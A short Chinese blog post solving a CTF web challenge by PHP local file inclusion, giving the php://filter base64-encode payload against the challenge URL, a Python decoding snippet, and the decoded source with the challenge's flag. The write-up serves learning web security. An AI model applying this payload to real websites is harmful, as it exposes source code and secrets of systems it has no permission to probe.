醉梦半醒的博客

filter-文件包含

字数统计: 191阅读时长: 1 min
2018/07/15 Share

例题:http://4.chinalover.sinaapp.com/web7/index.php

参考:https://blog.csdn.net/qq_35544379/article/details/78230629

发现有一个get file的的文件包含,但是要如何获取flag呢?一直想不通

悄咪咪地搜索了下write up

payload为http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

index.php进行base64加密

放入python解密

import base64
s="PGh0bWw+CiAgICA8dGl0bGU+YXNkZjwvdGl0bGU+CiAgICAKPD9waHAKCWVycm9yX3JlcG9ydGluZygwKTsKCWlmKCEkX0dFVFtmaWxlXSl7ZWNobyAnPGEgaHJlZj0iLi9pbmRleC5waHA/ZmlsZT1zaG93LnBocCI+Y2xpY2sgbWU/IG5vPC9hPic7fQoJJGZpbGU9JF9HRVRbJ2ZpbGUnXTsKCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpewoJCWVjaG8gIk9oIG5vISI7CgkJZXhpdCgpOwoJfQoJaW5jbHVkZSgkZmlsZSk7IAovL2ZsYWc6bmN0ZntlZHVsY25pX2VsaWZfbGFjb2xfc2lfc2lodH0KCj8+CjwvaHRtbD4="
r=base64.b64decode(s)
print(r)

 

 

结果为:

b’\n asdf\n \n<?php\n\terror_reporting(0);\n\tif(!$_GET[file]){echo \’<a href=”./index.php?file=show.php”>click me? no\’;}\n\t$file=$_GET[\’file\’];\n\tif(strstr($file,”../”)||stristr($file, “tp”)||stristr($file,”input”)||stristr($file,”data”)){\n\t\techo “Oh no!”;\n\t\texit();\n\t}\n\tinclude($file); \n//flag:nctf{edulcni_elif_lacol_si_siht}\n\n?>\n’

CATALOG